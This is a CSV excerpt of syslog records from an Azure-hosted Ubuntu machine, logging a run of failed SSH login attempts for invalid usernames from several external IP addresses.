+7279,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:29:36,UbuntuDevEnv,2019-06-26 17:29:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,50496,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7280,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:29:36,UbuntuDevEnv,2019-06-26 17:29:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=74.94.246.82,50496,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,74.94.246.8,,0,
+7281,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:29:38,UbuntuDevEnv,2019-06-26 17:29:37,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 74.94.246.82 port 34436 ssh2,50496,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,74.94.246.8,34436,,
+7282,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:29:38,UbuntuDevEnv,2019-06-26 17:29:37,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 74.94.246.82 port 34436 [preauth],50496,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,74.94.246.8,34436,,
+7283,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:29:38,UbuntuDevEnv,2019-06-26 17:29:37,auth,UbuntuDevEnv,info,Received disconnect from 74.94.246.82 port 34436:11: Bye Bye [preauth],50496,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,74.94.246.8,34436,,
+7284,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:30:01,UbuntuDevEnv,2019-06-26 17:30:00,auth,UbuntuDevEnv,info,Invalid user websphere from 77.237.69.165 port 33945,50584,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,websphere,77.237.69.1,33945,,
+7285,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:30:01,UbuntuDevEnv,2019-06-26 17:30:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,50584,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7286,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:30:01,UbuntuDevEnv,2019-06-26 17:30:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.237.69.165,50584,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.237.69.1,,0,
+7287,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:30:02,UbuntuDevEnv,2019-06-26 17:30:02,auth,UbuntuDevEnv,info,Failed password for invalid user websphere from 77.237.69.165 port 33945 ssh2,50584,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,websphere,77.237.69.1,33945,,
+7288,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:30:02,UbuntuDevEnv,2019-06-26 17:30:02,auth,UbuntuDevEnv,info,Disconnected from invalid user websphere 77.237.69.165 port 33945 [preauth],50584,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,websphere,77.237.69.1,33945,,
+7289,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:30:02,UbuntuDevEnv,2019-06-26 17:30:02,auth,UbuntuDevEnv,info,Received disconnect from 77.237.69.165 port 33945:11: Bye Bye [preauth],50584,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.237.69.1,33945,,
+7290,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:30:15,UbuntuDevEnv,2019-06-26 17:30:15,auth,UbuntuDevEnv,info,Invalid user ralf from 58.87.109.107 port 30440,50667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ralf,58.87.109.1,30440,,
+7291,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:30:15,UbuntuDevEnv,2019-06-26 17:30:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.87.109.107,50667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,58.87.109.1,,0,
+7292,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:30:15,UbuntuDevEnv,2019-06-26 17:30:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,50667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7293,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:30:17,UbuntuDevEnv,2019-06-26 17:30:17,auth,UbuntuDevEnv,info,Failed password for invalid user ralf from 58.87.109.107 port 30440 ssh2,50667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ralf,58.87.109.1,30440,,
+7294,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:30:18,UbuntuDevEnv,2019-06-26 17:30:17,auth,UbuntuDevEnv,info,Received disconnect from 58.87.109.107 port 30440:11: Bye Bye [preauth],50667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.87.109.1,30440,,
+7295,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:30:18,UbuntuDevEnv,2019-06-26 17:30:17,auth,UbuntuDevEnv,info,Disconnected from invalid user ralf 58.87.109.107 port 30440 [preauth],50667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ralf,58.87.109.1,30440,,
+7296,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:30:55,UbuntuDevEnv,2019-06-26 17:30:54,auth,UbuntuDevEnv,info,Invalid user jue from 111.230.29.17 port 42146,50860,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jue,111.230.29.1,42146,,
+7297,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:30:55,UbuntuDevEnv,2019-06-26 17:30:54,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,50860,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7298,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:30:55,UbuntuDevEnv,2019-06-26 17:30:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=111.230.29.17,50860,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,111.230.29.1,,0,
+7299,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:30:56,UbuntuDevEnv,2019-06-26 17:30:56,auth,UbuntuDevEnv,info,Failed password for invalid user jue from 111.230.29.17 port 42146 ssh2,50860,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jue,111.230.29.1,42146,,
+7300,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:30:56,UbuntuDevEnv,2019-06-26 17:30:56,auth,UbuntuDevEnv,info,Received disconnect from 111.230.29.17 port 42146:11: Bye Bye [preauth],50860,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,111.230.29.1,42146,,
+7301,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:30:56,UbuntuDevEnv,2019-06-26 17:30:56,auth,UbuntuDevEnv,info,Disconnected from invalid user jue 111.230.29.17 port 42146 [preauth],50860,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jue,111.230.29.1,42146,,
+7302,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:31:11,UbuntuDevEnv,2019-06-26 17:31:11,auth,UbuntuDevEnv,info,Invalid user cron from 74.94.246.82 port 51612,50922,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cron,74.94.246.8,51612,,
+7303,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:31:11,UbuntuDevEnv,2019-06-26 17:31:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,50922,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7304,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:31:11,UbuntuDevEnv,2019-06-26 17:31:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=74.94.246.82,50922,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,74.94.246.8,,0,
+7305,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:31:13,UbuntuDevEnv,2019-06-26 17:31:13,auth,UbuntuDevEnv,info,Failed password for invalid user cron from 74.94.246.82 port 51612 ssh2,50922,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cron,74.94.246.8,51612,,
+7306,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:31:13,UbuntuDevEnv,2019-06-26 17:31:13,auth,UbuntuDevEnv,info,Disconnected from invalid user cron 74.94.246.82 port 51612 [preauth],50922,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cron,74.94.246.8,51612,,
+7307,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:31:13,UbuntuDevEnv,2019-06-26 17:31:13,auth,UbuntuDevEnv,info,Received disconnect from 74.94.246.82 port 51612:11: Bye Bye [preauth],50922,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,74.94.246.8,51612,,
+7308,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:31:30,UbuntuDevEnv,2019-06-26 17:31:30,auth,UbuntuDevEnv,info,Invalid user dz from 77.237.69.165 port 41132,50999,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dz,77.237.69.1,41132,,
+7309,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:31:30,UbuntuDevEnv,2019-06-26 17:31:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.237.69.165,50999,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.237.69.1,,0,
+7310,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:31:30,UbuntuDevEnv,2019-06-26 17:31:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,50999,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7311,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:31:33,UbuntuDevEnv,2019-06-26 17:31:32,auth,UbuntuDevEnv,info,Failed password for invalid user dz from 77.237.69.165 port 41132 ssh2,50999,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dz,77.237.69.1,41132,,
+7312,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:31:33,UbuntuDevEnv,2019-06-26 17:31:32,auth,UbuntuDevEnv,info,Received disconnect from 77.237.69.165 port 41132:11: Bye Bye [preauth],50999,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.237.69.1,41132,,
+7313,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:31:33,UbuntuDevEnv,2019-06-26 17:31:32,auth,UbuntuDevEnv,info,Disconnected from invalid user dz 77.237.69.165 port 41132 [preauth],50999,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dz,77.237.69.1,41132,,
+7314,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:50:38,UbuntuDevEnv,2019-06-26 17:50:38,auth,UbuntuDevEnv,info,Invalid user netika from 58.87.109.107 port 31229,55232,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,netika,58.87.109.1,31229,,
+7315,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:50:38,UbuntuDevEnv,2019-06-26 17:50:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,55232,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7316,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:50:38,UbuntuDevEnv,2019-06-26 17:50:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.87.109.107,55232,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,58.87.109.1,,0,
+7317,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:50:41,UbuntuDevEnv,2019-06-26 17:50:41,auth,UbuntuDevEnv,info,Failed password for invalid user netika from 58.87.109.107 port 31229 ssh2,55232,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,netika,58.87.109.1,31229,,
+7318,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:50:41,UbuntuDevEnv,2019-06-26 17:50:41,auth,UbuntuDevEnv,info,Received disconnect from 58.87.109.107 port 31229:11: Bye Bye [preauth],55232,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.87.109.1,31229,,
+7319,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:50:41,UbuntuDevEnv,2019-06-26 17:50:41,auth,UbuntuDevEnv,info,Disconnected from invalid user netika 58.87.109.107 port 31229 [preauth],55232,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,netika,58.87.109.1,31229,,
+7320,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:50:49,UbuntuDevEnv,2019-06-26 17:50:49,auth,UbuntuDevEnv,info,Invalid user radius from 157.230.190.1 port 49404,55270,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,radius,157.230.190.1,49404,,
+7321,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:50:49,UbuntuDevEnv,2019-06-26 17:50:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,55270,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7322,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:50:49,UbuntuDevEnv,2019-06-26 17:50:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.190.1,55270,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.190.1,,0,
+7323,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:50:51,UbuntuDevEnv,2019-06-26 17:50:50,auth,UbuntuDevEnv,info,Invalid user PRECISIONGLUSER from 178.128.150.158 port 40798,55281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,PRECISIONGLUSER,178.128.150.1,40798,,
+7324,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:50:51,UbuntuDevEnv,2019-06-26 17:50:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,55281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7325,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:50:51,UbuntuDevEnv,2019-06-26 17:50:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=178.128.150.158,55281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,178.128.150.1,,0,
+7326,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:50:51,UbuntuDevEnv,2019-06-26 17:50:51,auth,UbuntuDevEnv,info,Failed password for invalid user radius from 157.230.190.1 port 49404 ssh2,55270,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,radius,157.230.190.1,49404,,
+7327,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:50:51,UbuntuDevEnv,2019-06-26 17:50:51,auth,UbuntuDevEnv,info,Received disconnect from 157.230.190.1 port 49404:11: Bye Bye [preauth],55270,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.190.1,49404,,
+7328,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:50:51,UbuntuDevEnv,2019-06-26 17:50:51,auth,UbuntuDevEnv,info,Disconnected from invalid user radius 157.230.190.1 port 49404 [preauth],55270,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,radius,157.230.190.1,49404,,
+7329,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:50:53,UbuntuDevEnv,2019-06-26 17:50:53,auth,UbuntuDevEnv,info,Failed password for invalid user PRECISIONGLUSER from 178.128.150.158 port 40798 ssh2,55281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,PRECISIONGLUSER,178.128.150.1,40798,,
+7330,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:50:53,UbuntuDevEnv,2019-06-26 17:50:53,auth,UbuntuDevEnv,info,Disconnected from invalid user PRECISIONGLUSER 178.128.150.158 port 40798 [preauth],55281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,PRECISIONGLUSER,178.128.150.1,40798,,
+7331,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:50:53,UbuntuDevEnv,2019-06-26 17:50:53,auth,UbuntuDevEnv,info,Received disconnect from 178.128.150.158 port 40798:11: Bye Bye [preauth],55281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.128.150.1,40798,,
+7332,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:51:37,UbuntuDevEnv,2019-06-26 17:51:37,auth,UbuntuDevEnv,info,Invalid user dz from 54.37.66.73 port 37841,55449,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dz,54.37.66.7,37841,,
+7333,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:51:37,UbuntuDevEnv,2019-06-26 17:51:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,55449,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7334,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:51:37,UbuntuDevEnv,2019-06-26 17:51:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=54.37.66.73,55449,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,54.37.66.7,,0,
+7335,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:51:38,UbuntuDevEnv,2019-06-26 17:51:37,auth,UbuntuDevEnv,info,Invalid user sublink from 80.108.220.67 port 44976,55434,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sublink,80.108.220.6,44976,,
+7336,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:51:38,UbuntuDevEnv,2019-06-26 17:51:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,55434,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7337,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:51:38,UbuntuDevEnv,2019-06-26 17:51:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=80.108.220.67,55434,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,80.108.220.6,,0,
+7338,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:51:40,UbuntuDevEnv,2019-06-26 17:51:39,auth,UbuntuDevEnv,info,Failed password for invalid user dz from 54.37.66.73 port 37841 ssh2,55449,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dz,54.37.66.7,37841,,
